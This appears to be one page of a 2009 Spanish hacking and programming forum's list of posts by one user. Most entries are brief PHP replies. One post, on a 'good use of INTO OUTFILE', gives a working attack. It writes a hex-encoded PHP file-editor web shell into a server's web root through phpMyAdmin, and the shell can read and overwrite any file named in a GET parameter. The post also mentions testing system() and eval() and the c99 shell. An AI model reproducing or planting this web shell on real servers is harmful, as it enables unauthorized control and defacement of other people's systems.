últimos mensajes de: HardieVon

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14

81	Programación / PHP / Re: Manual para principiantes de php	en: 7 Marzo 2009, 02:45 am
mmmm ps yo aprendi de libros pero supongo que este es el mejor.. http://www.php.net/manual/es/

82	Seguridad Informática / Nivel Web / Re: gmail CSRF	en: 6 Marzo 2009, 05:07 am
ps yo creo que no lo an parchado por que no importa...no afecta en nada..

83	Seguridad Informática / Nivel Web / Re: Un buen uso de INTO OUTFILE	en: 6 Marzo 2009, 05:00 am
Si lo que pasa es que con esa tecnica.. existen archivos que superan el tiempo de ejecucion... por que el file_get, supera en algunos casos...colosales tamaños como la c99 y tambien existen algunos server sin consola... Saludos de perro

Seguridad Informática / Nivel Web / Un buen uso de INTO OUTFILE

en: 6 Marzo 2009, 02:17 am

Hola que tal encontre un servidor con phpmyadmin y entre tantas pruebas de codigo como.
<? system(...
<? eval(....
me decidi en fabricar una pequeña herramientilla.

utilizando la instruccion OUTFILE...

Código

SELECT 0x64 /* Hexadecimal */ INTO OUTFILE "C:/servidor/editor.php"; /* Path del servidor */

y con el codigo php.

Código

<?php $f=$_GET['f'];$s=$_POST['s'];if($s!=''){if($r=fopen($f,'w+')){fwrite($r,stripslashes($s));echo 'OK<br>';}fclose($r);}$r=fopen($f,'r');$c=fread($r,filesize($f));fclose($r);echo "<form method=POST ><textarea name=s >$c</textarea><br><input type=submit value=guardar ></form>";?>

ahora concluimos con este codigo y podremos editar archivos en el servidor...

Código

SELECT
0x3C3F7068702024663D245F4745545B2766275D3B24733D245F504F53545B2773275D3B6966282473213D2727297B69662824723D666F70656E2824662C27772B2729297B6677726974652824722C7374726970736C617368657328247329293B6563686F20274F4B3C62723E273B7D66636C6F7365282472293B7D24723D666F70656E2824662C277227293B24633D66726561642824722C66696C6573697A6528246629293B66636C6F7365282472293B6563686F20223C666F726D206D6574686F643D504F5354203E3C7465787461726561206E616D653D73203E24633C2F74657874617265613E3C62723E3C696E70757420747970653D7375626D69742076616C75653D67756172646172203E3C2F666F726D3E223B3F3E 
INTO OUTFILE "C:/servidor/editor.php";

el nombre del fichero se pasa por una variable GET llamada "f".
de la forma editor.php?f=index.php

Saludos de perro

85	Programación / PHP / Re: Pregunta sobre Whois en php.	en: 2 Marzo 2009, 19:22 pm
Federal es azul marino... Federal de caminos es Negro... jaja no por que sean los dos charger van a ser del mismo rubro.

86	Programación / PHP / Re: Pregunta sobre Whois en php.	en: 2 Marzo 2009, 06:06 am
jajaja por que todos los cops rulan, nimodo que ponga un Agente Federal en una compu con cara de pendejo jajaja. ps tengo que poner algo que apantalle. saludos y recuerda que muy pronto nada sera legal. por cierto, no es de caminos...

87	Programación / PHP / Re: Pregunta sobre Whois en php.	en: 2 Marzo 2009, 02:27 am
Y con un socket como te das cuenta que el dominio esta supendido o prohibido?

88	Programación / PHP / Re: ¿Como saber la raíz de la página?	en: 1 Marzo 2009, 18:53 pm
Código echo $_SERVER["DOCUMENT_ROOT"]; echo dirname($_SERVER["SCRIPT_FILENAME"]); raiz hasta carpeta actual o raiz

89	Programación / PHP / Re: Fake Exploit como firma	en: 1 Marzo 2009, 06:47 am
Excelente observación.

90	Programación / PHP / Re: Proteger login contra bruteforcers	en: 28 Febrero 2009, 07:55 am
lo mas viable es un campo oculto creado con una sesion por que lo de las cookies jajaja nada mas le dejas la cabecera congelada y es como si nada pasara.

Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14